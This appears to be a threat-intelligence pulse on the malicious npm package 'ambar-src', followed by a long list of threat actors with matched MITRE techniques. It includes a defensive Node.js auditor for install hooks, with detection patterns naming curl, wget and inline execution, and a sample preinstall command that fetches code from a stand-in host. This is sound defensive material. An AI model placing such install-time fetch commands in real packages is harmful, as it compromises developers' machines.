Trusted Design

New malicious npm package 'ambar-src' targets developers with open source malware

Summary

A malicious npm package named "ambar-src" reached 50,000 downloads in days before being removed from the registry. It uses a preinstall script to execute malicious code during installation, targeting Windows, Linux, and macOS systems. The package employs detection evasion techniques and deploys powerful open-source malware variants. It abuses npm's preinstall script hook to trigger the payload without explicit invocation. The malware fetches additional payloads from remote servers and uses Yandex Cloud for command and control. Affected systems should be considered fully compromised, requiring immediate incident response actions. The attack highlights the speed at which supply chain risks can propagate and confirms that npm install is a high-risk action.
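As an added example (not part of the original pulse, and not code from the ambar-src package or from its analysts), the Node.js script below shows how a defender can audit a package manifest for the install-time lifecycle hooks the summary describes, flag hook commands that fetch or execute code inline, and emit the `.npmrc` setting that stops npm from running such scripts at all. The three sample manifests, the indicator patterns and the `riskLevel` thresholds are constructed assumptions for illustration; `ignore-scripts` is a real npm configuration key.

```javascript
// Added example, not code from the original pulse or from the ambar-src package.
// Audits an npm package manifest for lifecycle scripts that npm runs automatically
// during `npm install` (the hook the summary says ambar-src abused) and flags
// commands that fetch or execute code inline. Pattern names, regexes and the
// risk thresholds are assumptions chosen for illustration, not an npm feature.

// Hooks npm runs on install without the user invoking them explicitly.
const AUTO_RUN_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic indicators (assumed, defender-chosen): a label plus a regex.
const INDICATORS = [
  ["fetches from network", /\b(curl|wget|Invoke-WebRequest|iwr|fetch\()/i],
  ["inline code execution", /\b(node\s+(-e|--eval)|powershell|sh\s+-c|eval\()/i],
  ["decodes hidden payload", /\b(base64|atob\(|Buffer\.from\([^)]*'base64')/i],
  ["spawns child process", /child_process/],
  ["touches paths outside package", /(\$HOME|~\/|%APPDATA%|\/tmp\/)/],
];

// Parse a package.json text and return one finding per auto-run hook present.
function auditLifecycleScripts(manifestText) {
  const manifest = JSON.parse(manifestText);
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of AUTO_RUN_HOOKS) {
    if (typeof scripts[hook] !== "string") continue;
    const command = scripts[hook];
    const indicators = INDICATORS
      .filter(([, re]) => re.test(command))
      .map(([label]) => label);
    findings.push({ package: manifest.name || "(unnamed)", hook, command, indicators });
  }
  return findings;
}

// Verdict: any auto-run hook deserves human review; inline fetch/exec is high.
function riskLevel(findings) {
  if (findings.length === 0) return "none";
  return findings.some((f) => f.indicators.length > 0) ? "high" : "review";
}

// Hardening: tell npm not to run lifecycle scripts. `ignore-scripts` is a real
// npm config key and can live in a project or user .npmrc.
const HARDENED_NPMRC = "ignore-scripts=true\n";

// Constructed sample manifests (not real packages; example.invalid is reserved).
const SAMPLE_BENIGN = JSON.stringify({
  name: "sample-lib",
  scripts: { test: "jest", build: "tsc" },
});
const SAMPLE_NATIVE = JSON.stringify({
  name: "sample-addon",
  scripts: { install: "node-gyp rebuild" },
});
const SAMPLE_SUSPECT = JSON.stringify({
  name: "sample-suspect",
  scripts: {
    preinstall:
      "node -e \"require('child_process').execSync('curl -s http://example.invalid/p')\"",
  },
});

// Stand-alone demo over the constructed samples.
for (const text of [SAMPLE_BENIGN, SAMPLE_NATIVE, SAMPLE_SUSPECT]) {
  const findings = auditLifecycleScripts(text);
  console.log(JSON.parse(text).name, riskLevel(findings), JSON.stringify(findings));
}
```

To use it on a real dependency, pass the contents of that package's `package.json` (for example each `node_modules/<pkg>/package.json`) to `auditLifecycleScripts` before the package is installed with scripts enabled. A "review" verdict is expected for native addons that legitimately build on install, such as the `node-gyp rebuild` sample; with `ignore-scripts=true` in `.npmrc` those packages need an explicit `npm rebuild` after the manifest has been inspected.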

Created: 2026-02-27

Indicators

Similar Pulses

No similar Pulses were found.

Threat actors related to this Pulse (fact-based)

Mustang Panda

Score: 59.61
Matched TTPs:
  • T1129 - Shared Modules
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1574.001 - DLL
  • T1608.001 - Upload Malware
  • T1176.002 - IDE Extensions
  • T1016 - System Network Configuration Discovery
  • T1574.005 - Executable Installer File Permissions Weakness
  • T1059 - Command and Scripting Interpreter
  • T1218.005 - Mshta
  • T1608 - Stage Capabilities
  • T1027.012 - LNK Icon Smuggling
  • T1583.006 - Web Services
  • T1041 - Exfiltration Over C2 Channel
  • T1593 - Search Open Websites/Domains
  • T1678 - Delay Execution
  • T1588.002 - Tool
  • T1203 - Exploitation for Client Execution
  • T1070.004 - File Deletion
  • T1518 - Software Discovery
  • T1027.007 - Dynamic API Resolution
Link to MITRE →

Winnti Group

Score: 3.29
Matched TTPs:
  • T1014 - Rootkit
Link to MITRE →

APT41

Score: 59.95
Matched TTPs:
  • T1014 - Rootkit
  • T1003.002 - Security Account Manager
  • T1574.001 - DLL
  • T1190 - Exploit Public-Facing Application
  • T1055 - Process Injection
  • T1595.002 - Vulnerability Scanning
  • T1555.003 - Credentials from Web Browsers
  • T1574.006 - Dynamic Linker Hijacking
  • T1016 - System Network Configuration Discovery
  • T1546.008 - Accessibility Features
  • T1090 - Proxy
  • T1036.004 - Masquerade Task or Service
  • T1588.002 - Tool
  • T1218.001 - Compiled HTML File
  • T1486 - Data Encrypted for Impact
  • T1195.002 - Compromise Software Supply Chain
  • T1203 - Exploitation for Client Execution
  • T1595.003 - Wordlist Scanning
  • T1213.003 - Code Repositories
  • T1070.004 - File Deletion
  • T1027.002 - Software Packing
  • T1596.005 - Scan Databases
  • T1480.001 - Environmental Keying
Link to MITRE →

Rocke

Score: 29.30
Matched TTPs:
  • T1014 - Rootkit
  • T1070.002 - Clear Linux or Mac System Logs
  • T1071 - Application Layer Protocol
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1574.006 - Dynamic Linker Hijacking
  • T1027.004 - Compile After Delivery
  • T1518.001 - Security Software Discovery
  • T1059.006 - Python
  • T1070.004 - File Deletion
  • T1027.002 - Software Packing
Link to MITRE →

TeamTNT

Score: 42.05
Matched TTPs:
  • T1014 - Rootkit
  • T1587.001 - Malware
  • T1070.002 - Clear Linux or Mac System Logs
  • T1007 - System Service Discovery
  • T1071 - Application Layer Protocol
  • T1608.001 - Upload Malware
  • T1036 - Masquerading
  • T1562.004 - Disable or Modify System Firewall
  • T1595.002 - Vulnerability Scanning
  • T1610 - Deploy Container
  • T1016 - System Network Configuration Discovery
  • T1552.001 - Credentials In Files
  • T1518.001 - Security Software Discovery
  • T1070.004 - File Deletion
  • T1595.001 - Scanning IP Blocks
  • T1027.002 - Software Packing
Link to MITRE →

APT28

Score: 41.17
Matched TTPs:
  • T1014 - Rootkit
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1190 - Exploit Public-Facing Application
  • T1036 - Masquerading
  • T1595.002 - Vulnerability Scanning
  • T1090.002 - External Proxy
  • T1583.006 - Web Services
  • T1591 - Gather Victim Org Information
  • T1210 - Exploitation of Remote Services
  • T1588.002 - Tool
  • T1589.001 - Credentials
  • T1203 - Exploitation for Client Execution
  • T1070.004 - File Deletion
  • T1189 - Drive-by Compromise
  • T1137.002 - Office Test
  • T1211 - Exploitation for Defense Evasion
Link to MITRE →

UNC3886

Score: 53.35
Matched TTPs:
  • T1014 - Rootkit
  • T1587.001 - Malware
  • T1675 - ESXi Administration Command
  • T1070.007 - Clear Network Connection History and Configurations
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1681 - Search Threat Vendor Data
  • T1673 - Virtual Machine Discovery
  • T1588.001 - Malware
  • T1036.004 - Masquerade Task or Service
  • T1554 - Compromise Host Software Binary
  • T1587.004 - Exploits
  • T1203 - Exploitation for Client Execution
  • T1059.006 - Python
  • T1059.012 - Hypervisor CLI
  • T1070.004 - File Deletion
  • T1505.006 - vSphere Installation Bundles
Link to MITRE →

Daggerfly

Score: 12.31
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1574.001 - DLL
  • T1195.002 - Compromise Software Supply Chain
  • T1036.003 - Rename Legitimate Utilities
  • T1189 - Drive-by Compromise
Link to MITRE →

GALLIUM

Score: 18.17
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1574.001 - DLL
  • T1190 - Exploit Public-Facing Application
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1041 - Exfiltration Over C2 Channel
  • T1588.002 - Tool
  • T1036.003 - Rename Legitimate Utilities
  • T1027.002 - Software Packing
Link to MITRE →

APT29

Score: 35.51
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1090.002 - External Proxy
  • T1546.008 - Accessibility Features
  • T1218.005 - Mshta
  • T1021.007 - Cloud Services
  • T1583.006 - Web Services
  • T1588.002 - Tool
  • T1573 - Encrypted Channel
  • T1203 - Exploitation for Client Execution
  • T1059.006 - Python
  • T1070.004 - File Deletion
  • T1027.002 - Software Packing
Link to MITRE →

FIN13

Score: 19.94
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1587.001 - Malware
  • T1574.001 - DLL
  • T1190 - Exploit Public-Facing Application
  • T1036 - Masquerading
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1552.001 - Credentials In Files
  • T1588.002 - Tool
  • T1090.001 - Internal Proxy
Link to MITRE →

Dragonfly

Score: 33.18
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1595.002 - Vulnerability Scanning
  • T1016 - System Network Configuration Discovery
  • T1059 - Command and Scripting Interpreter
  • T1598.002 - Spearphishing Attachment
  • T1210 - Exploitation of Remote Services
  • T1588.002 - Tool
  • T1195.002 - Compromise Software Supply Chain
  • T1203 - Exploitation for Client Execution
  • T1059.006 - Python
  • T1070.004 - File Deletion
  • T1189 - Drive-by Compromise
Link to MITRE →

Ke3chang

Score: 19.16
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1587.001 - Malware
  • T1583.005 - Botnet
  • T1007 - System Service Discovery
  • T1190 - Exploit Public-Facing Application
  • T1016 - System Network Configuration Discovery
  • T1059 - Command and Scripting Interpreter
  • T1041 - Exfiltration Over C2 Channel
  • T1588.002 - Tool
Link to MITRE →

Agrius

Score: 8.22
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1190 - Exploit Public-Facing Application
  • T1036 - Masquerading
  • T1041 - Exfiltration Over C2 Channel
Link to MITRE →

APT5

Score: 15.88
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1583.005 - Botnet
  • T1190 - Exploit Public-Facing Application
  • T1055 - Process Injection
  • T1554 - Compromise Host Software Binary
  • T1070.004 - File Deletion
Link to MITRE →

menuPass

Score: 21.25
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1190 - Exploit Public-Facing Application
  • T1036 - Masquerading
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1210 - Exploitation of Remote Services
  • T1588.002 - Tool
  • T1036.003 - Rename Legitimate Utilities
  • T1070.004 - File Deletion
Link to MITRE →

Threat Group-3390

Score: 27.38
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1608.002 - Upload Tool
  • T1016 - System Network Configuration Discovery
  • T1210 - Exploitation of Remote Services
  • T1588.002 - Tool
  • T1195.002 - Compromise Software Supply Chain
  • T1203 - Exploitation for Client Execution
  • T1070.004 - File Deletion
  • T1189 - Drive-by Compromise
  • T1027.002 - Software Packing
Link to MITRE →

Wizard Spider

Score: 24.65
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1204.002 - Malicious File
  • T1055 - Process Injection
  • T1518.002 - Backup Software Discovery
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1041 - Exfiltration Over C2 Channel
  • T1210 - Exploitation of Remote Services
  • T1588.002 - Tool
  • T1518.001 - Security Software Discovery
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
Link to MITRE →

Ember Bear

Score: 31.55
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1195 - Supply Chain Compromise
  • T1190 - Exploit Public-Facing Application
  • T1036 - Masquerading
  • T1595.002 - Vulnerability Scanning
  • T1588.001 - Malware
  • T1552.001 - Credentials In Files
  • T1210 - Exploitation of Remote Services
  • T1203 - Exploitation for Client Execution
  • T1070.004 - File Deletion
  • T1595.001 - Scanning IP Blocks
  • T1588.005 - Exploits
Link to MITRE →

Sea Turtle

Score: 21.81
Matched TTPs:
  • T1583.002 - DNS Server
  • T1114.001 - Local Email Collection
  • T1213.006 - Databases
  • T1070.002 - Clear Linux or Mac System Logs
  • T1190 - Exploit Public-Facing Application
  • T1588.002 - Tool
  • T1203 - Exploitation for Client Execution
  • T1027.004 - Compile After Delivery
Link to MITRE →

Axiom

Score: 20.02
Matched TTPs:
  • T1583.002 - DNS Server
  • T1190 - Exploit Public-Facing Application
  • T1546.008 - Accessibility Features
  • T1584.005 - Botnet
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1001.002 - Steganography
Link to MITRE →

HEXANE

Score: 22.83
Matched TTPs:
  • T1583.002 - DNS Server
  • T1204.002 - Malicious File
  • T1608.001 - Upload Malware
  • T1555.003 - Credentials from Web Browsers
  • T1016 - System Network Configuration Discovery
  • T1534 - Internal Spearphishing
  • T1588.002 - Tool
  • T1591.004 - Identify Roles
  • T1027.010 - Command Obfuscation
  • T1518 - Software Discovery
Link to MITRE →

RedCurl

Score: 18.60
Matched TTPs:
  • T1114.001 - Local Email Collection
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1555.003 - Credentials from Web Browsers
  • T1552.001 - Credentials In Files
  • T1056.002 - GUI Input Capture
  • T1059.006 - Python
  • T1070.004 - File Deletion
Link to MITRE →

APT1

Score: 10.59
Matched TTPs:
  • T1114.001 - Local Email Collection
  • T1007 - System Service Discovery
  • T1016 - System Network Configuration Discovery
  • T1588.001 - Malware
  • T1588.002 - Tool
Link to MITRE →

Chimera

Score: 23.06
Matched TTPs:
  • T1114.001 - Local Email Collection
  • T1574.001 - DLL
  • T1007 - System Service Discovery
  • T1016 - System Network Configuration Discovery
  • T1041 - Exfiltration Over C2 Channel
  • T1588.002 - Tool
  • T1589.001 - Credentials
  • T1556.001 - Domain Controller Authentication
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
Link to MITRE →

Magic Hound

Score: 48.22
Matched TTPs:
  • T1114.001 - Local Email Collection
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1071 - Application Layer Protocol
  • T1562 - Impair Defenses
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1595.002 - Vulnerability Scanning
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1036.004 - Masquerade Task or Service
  • T1583.006 - Web Services
  • T1588.002 - Tool
  • T1486 - Data Encrypted for Impact
  • T1573 - Encrypted Channel
  • T1589.001 - Credentials
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
  • T1189 - Drive-by Compromise
  • T1591.001 - Determine Physical Locations
Link to MITRE →

Winter Vivern

Score: 21.33
Matched TTPs:
  • T1114.001 - Local Email Collection
  • T1190 - Exploit Public-Facing Application
  • T1036 - Masquerading
  • T1595.002 - Vulnerability Scanning
  • T1059 - Command and Scripting Interpreter
  • T1036.004 - Masquerade Task or Service
  • T1041 - Exfiltration Over C2 Channel
  • T1584.006 - Web Services
  • T1189 - Drive-by Compromise
Link to MITRE →

Kimsuky

Score: 59.13
Matched TTPs:
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1007 - System Service Discovery
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1055 - Process Injection
  • T1562.004 - Disable or Modify System Firewall
  • T1555.003 - Credentials from Web Browsers
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1552.001 - Credentials In Files
  • T1218.005 - Mshta
  • T1027.012 - LNK Icon Smuggling
  • T1583.006 - Web Services
  • T1041 - Exfiltration Over C2 Channel
  • T1591 - Gather Victim Org Information
  • T1534 - Internal Spearphishing
  • T1593 - Search Open Websites/Domains
  • T1588.002 - Tool
  • T1518.001 - Security Software Discovery
  • T1059.006 - Python
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
  • T1027.002 - Software Packing
  • T1588.005 - Exploits
Link to MITRE →

Moonstone Sleet

Score: 17.34
Matched TTPs:
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1608.001 - Upload Malware
  • T1016 - System Network Configuration Discovery
  • T1591 - Gather Victim Org Information
  • T1486 - Data Encrypted for Impact
  • T1195.002 - Compromise Software Supply Chain
Link to MITRE →

Indrik Spider

Score: 10.27
Matched TTPs:
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1007 - System Service Discovery
  • T1552.001 - Credentials In Files
  • T1486 - Data Encrypted for Impact
Link to MITRE →

Lazarus Group

Score: 46.47
Matched TTPs:
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1218 - System Binary Proxy Execution
  • T1562.004 - Disable or Modify System Firewall
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1041 - Exfiltration Over C2 Channel
  • T1591 - Gather Victim Org Information
  • T1588.002 - Tool
  • T1036.003 - Rename Legitimate Utilities
  • T1203 - Exploitation for Client Execution
  • T1070.004 - File Deletion
  • T1189 - Drive-by Compromise
  • T1027.007 - Dynamic API Resolution
  • T1090.001 - Internal Proxy
  • T1529 - System Shutdown/Reboot
Link to MITRE →

Contagious Interview

Score: 40.84
Matched TTPs:
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1608.001 - Upload Malware
  • T1036 - Masquerading
  • T1681 - Search Threat Vendor Data
  • T1090 - Proxy
  • T1204.005 - Malicious Library
  • T1583.006 - Web Services
  • T1041 - Exfiltration Over C2 Channel
  • T1593 - Search Open Websites/Domains
  • T1588.002 - Tool
  • T1059.006 - Python
  • T1543.001 - Launch Agent
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
  • T1204.004 - Malicious Copy and Paste
Link to MITRE →

OilRig

Score: 39.28
Matched TTPs:
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1497.001 - System Checks
  • T1007 - System Service Discovery
  • T1608.001 - Upload Malware
  • T1195 - Supply Chain Compromise
  • T1036 - Masquerading
  • T1562.004 - Disable or Modify System Firewall
  • T1555.003 - Credentials from Web Browsers
  • T1016 - System Network Configuration Discovery
  • T1059 - Command and Scripting Interpreter
  • T1552.001 - Credentials In Files
  • T1588.002 - Tool
  • T1218.001 - Compiled HTML File
  • T1203 - Exploitation for Client Execution
  • T1137.004 - Outlook Home Page
  • T1070.004 - File Deletion
Link to MITRE →

LuminousMoth

Score: 14.93
Matched TTPs:
  • T1587.001 - Malware
  • T1574.001 - DLL
  • T1608.001 - Upload Malware
  • T1588.001 - Malware
  • T1608.005 - Link Target
  • T1041 - Exfiltration Over C2 Channel
  • T1588.002 - Tool
Link to MITRE →

Sandworm Team

Score: 49.70
Matched TTPs:
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1213.006 - Databases
  • T1598.003 - Spearphishing Link
  • T1608.001 - Upload Malware
  • T1195 - Supply Chain Compromise
  • T1190 - Exploit Public-Facing Application
  • T1036 - Masquerading
  • T1595.002 - Vulnerability Scanning
  • T1555.003 - Credentials from Web Browsers
  • T1090 - Proxy
  • T1584.005 - Botnet
  • T1041 - Exfiltration Over C2 Channel
  • T1593 - Search Open Websites/Domains
  • T1588.002 - Tool
  • T1486 - Data Encrypted for Impact
  • T1195.002 - Compromise Software Supply Chain
  • T1203 - Exploitation for Client Execution
  • T1499 - Endpoint Denial of Service
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
Link to MITRE →

Salt Typhoon

Score: 14.91
Matched TTPs:
  • T1587.001 - Malware
  • T1070.002 - Clear Linux or Mac System Logs
  • T1190 - Exploit Public-Facing Application
  • T1602.002 - Network Device Configuration Dump
  • T1562.004 - Disable or Modify System Firewall
  • T1588.002 - Tool
Link to MITRE →

Play

Score: 11.03
Matched TTPs:
  • T1587.001 - Malware
  • T1190 - Exploit Public-Facing Application
  • T1016 - System Network Configuration Discovery
  • T1588.002 - Tool
  • T1518.001 - Security Software Discovery
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
Link to MITRE →

Aoqin Dragon

Score: 9.47
Matched TTPs:
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1036 - Masquerading
  • T1588.002 - Tool
  • T1203 - Exploitation for Client Execution
  • T1027.002 - Software Packing
Link to MITRE →

Moses Staff

Score: 8.23
Matched TTPs:
  • T1587.001 - Malware
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1016 - System Network Configuration Discovery
  • T1588.002 - Tool
Link to MITRE →

Turla

Score: 34.25
Matched TTPs:
  • T1587.001 - Malware
  • T1213.006 - Databases
  • T1007 - System Service Discovery
  • T1055 - Process Injection
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1588.001 - Malware
  • T1583.006 - Web Services
  • T1588.002 - Tool
  • T1584.006 - Web Services
  • T1518.001 - Security Software Discovery
  • T1059.006 - Python
  • T1027.010 - Command Obfuscation
  • T1189 - Drive-by Compromise
  • T1090.001 - Internal Proxy
Link to MITRE →

FIN7

Score: 47.61
Matched TTPs:
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1674 - Input Injection
  • T1059 - Command and Scripting Interpreter
  • T1036.004 - Masquerade Task or Service
  • T1218.005 - Mshta
  • T1608.005 - Link Target
  • T1583.006 - Web Services
  • T1497.002 - User Activity Based Checks
  • T1591 - Gather Victim Org Information
  • T1210 - Exploitation of Remote Services
  • T1588.002 - Tool
  • T1486 - Data Encrypted for Impact
  • T1195.002 - Compromise Software Supply Chain
  • T1591.004 - Identify Roles
  • T1027.010 - Command Obfuscation
Link to MITRE →

Medusa Group

Score: 29.97
Matched TTPs:
  • T1652 - Device Driver Discovery
  • T1190 - Exploit Public-Facing Application
  • T1608.002 - Upload Tool
  • T1562.004 - Disable or Modify System Firewall
  • T1016 - System Network Configuration Discovery
  • T1583.006 - Web Services
  • T1588.002 - Tool
  • T1486 - Data Encrypted for Impact
  • T1518.001 - Security Software Discovery
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
  • T1027.002 - Software Packing
  • T1529 - System Shutdown/Reboot
Link to MITRE →

Malteiro

Score: 4.74
Matched TTPs:
  • T1204.002 - Malicious File
  • T1555.003 - Credentials from Web Browsers
  • T1518.001 - Security Software Discovery
Link to MITRE →

Machete

Score: 8.18
Matched TTPs:
  • T1204.002 - Malicious File
  • T1218.007 - Msiexec
  • T1059.006 - Python
  • T1189 - Drive-by Compromise
Link to MITRE →

Elderwood

Score: 6.10
Matched TTPs:
  • T1204.002 - Malicious File
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1027.002 - Software Packing
Link to MITRE →

Transparent Tribe

Score: 4.05
Matched TTPs:
  • T1204.002 - Malicious File
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
Link to MITRE →

RTM

Score: 4.29
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1189 - Drive-by Compromise
Link to MITRE →

APT-C-36

Score: 3.73
Matched TTPs:
  • T1204.002 - Malicious File
  • T1036.004 - Masquerade Task or Service
  • T1588.002 - Tool
Link to MITRE →

CURIUM

Score: 10.61
Matched TTPs:
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1041 - Exfiltration Over C2 Channel
  • T1584.006 - Web Services
  • T1189 - Drive-by Compromise
Link to MITRE →

Tropic Trooper

Score: 15.13
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1016 - System Network Configuration Discovery
  • T1573 - Encrypted Channel
  • T1203 - Exploitation for Client Execution
  • T1518.001 - Security Software Discovery
  • T1070.004 - File Deletion
  • T1518 - Software Discovery
Link to MITRE →

Dark Caracal

Score: 8.05
Matched TTPs:
  • T1204.002 - Malicious File
  • T1218.001 - Compiled HTML File
  • T1189 - Drive-by Compromise
  • T1027.002 - Software Packing
Link to MITRE →

PLATINUM

Score: 7.20
Matched TTPs:
  • T1204.002 - Malicious File
  • T1036 - Masquerading
  • T1055 - Process Injection
  • T1189 - Drive-by Compromise
Link to MITRE →

TA551

Score: 7.18
Matched TTPs:
  • T1204.002 - Malicious File
  • T1036 - Masquerading
  • T1218.005 - Mshta
  • T1027.010 - Command Obfuscation
Link to MITRE →

FIN8

Score: 13.66
Matched TTPs:
  • T1204.002 - Malicious File
  • T1055.004 - Asynchronous Procedure Call
  • T1588.002 - Tool
  • T1486 - Data Encrypted for Impact
  • T1518.001 - Security Software Discovery
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
Link to MITRE →

BITTER

Score: 10.82
Matched TTPs:
  • T1204.002 - Malicious File
  • T1608.001 - Upload Malware
  • T1036.004 - Masquerade Task or Service
  • T1588.002 - Tool
  • T1573 - Encrypted Channel
  • T1203 - Exploitation for Client Execution
Link to MITRE →

APT37

Score: 16.86
Matched TTPs:
  • T1204.002 - Malicious File
  • T1055 - Process Injection
  • T1555.003 - Credentials from Web Browsers
  • T1059 - Command and Scripting Interpreter
  • T1203 - Exploitation for Client Execution
  • T1059.006 - Python
  • T1189 - Drive-by Compromise
  • T1529 - System Shutdown/Reboot
Link to MITRE →

LazyScripter

Score: 13.62
Matched TTPs:
  • T1204.002 - Malicious File
  • T1608.001 - Upload Malware
  • T1036 - Masquerading
  • T1588.001 - Malware
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1027.010 - Command Obfuscation
Link to MITRE →

PROMETHIUM

Score: 4.65
Matched TTPs:
  • T1204.002 - Malicious File
  • T1036.004 - Masquerade Task or Service
  • T1189 - Drive-by Compromise
Link to MITRE →

TA505

Score: 20.19
Matched TTPs:
  • T1204.002 - Malicious File
  • T1218.007 - Msiexec
  • T1608.001 - Upload Malware
  • T1555.003 - Credentials from Web Browsers
  • T1588.001 - Malware
  • T1552.001 - Credentials In Files
  • T1588.002 - Tool
  • T1486 - Data Encrypted for Impact
  • T1027.010 - Command Obfuscation
  • T1027.002 - Software Packing
Link to MITRE →

APT39

Score: 23.41
Matched TTPs:
  • T1204.002 - Malicious File
  • T1059.010 - AutoHotKey & AutoIT
  • T1190 - Exploit Public-Facing Application
  • T1090.002 - External Proxy
  • T1059 - Command and Scripting Interpreter
  • T1041 - Exfiltration Over C2 Channel
  • T1588.002 - Tool
  • T1059.006 - Python
  • T1070.004 - File Deletion
  • T1027.002 - Software Packing
  • T1090.001 - Internal Proxy
Link to MITRE →

Star Blizzard

Score: 12.98
Matched TTPs:
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1608.001 - Upload Malware
  • T1598.002 - Spearphishing Attachment
  • T1593 - Search Open Websites/Domains
  • T1588.002 - Tool
Link to MITRE →

Higaisa

Score: 12.48
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1041 - Exfiltration Over C2 Channel
  • T1203 - Exploitation for Client Execution
  • T1090.001 - Internal Proxy
Link to MITRE →

Rancor

Score: 4.07
Matched TTPs:
  • T1204.002 - Malicious File
  • T1218.007 - Msiexec
Link to MITRE →

FIN4

Score: 4.92
Matched TTPs:
  • T1204.002 - Malicious File
  • T1056.002 - GUI Input Capture
Link to MITRE →

Cobalt Group

Score: 17.79
Matched TTPs:
  • T1204.002 - Malicious File
  • T1055 - Process Injection
  • T1218.003 - CMSTP
  • T1588.002 - Tool
  • T1195.002 - Compromise Software Supply Chain
  • T1203 - Exploitation for Client Execution
  • T1518.001 - Security Software Discovery
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
Link to MITRE →

Storm-1811

Score: 12.44
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1036 - Masquerading
  • T1588.002 - Tool
  • T1486 - Data Encrypted for Impact
  • T1667 - Email Bombing
Link to MITRE →

Inception

Score: 10.27
Matched TTPs:
  • T1204.002 - Malicious File
  • T1555.003 - Credentials from Web Browsers
  • T1218.005 - Mshta
  • T1588.002 - Tool
  • T1203 - Exploitation for Client Execution
  • T1518 - Software Discovery
Link to MITRE →

EXOTIC LILY

Score: 4.25
Matched TTPs:
  • T1204.002 - Malicious File
  • T1608.001 - Upload Malware
  • T1203 - Exploitation for Client Execution
Link to MITRE →

Saint Bear

Score: 10.66
Matched TTPs:
  • T1204.002 - Malicious File
  • T1608.001 - Upload Malware
  • T1059 - Command and Scripting Interpreter
  • T1583.006 - Web Services
  • T1203 - Exploitation for Client Execution
  • T1027.002 - Software Packing
Link to MITRE →

FIN6

Score: 14.99
Matched TTPs:
  • T1204.002 - Malicious File
  • T1213.006 - Databases
  • T1555.003 - Credentials from Web Browsers
  • T1059 - Command and Scripting Interpreter
  • T1036.004 - Masquerade Task or Service
  • T1588.002 - Tool
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
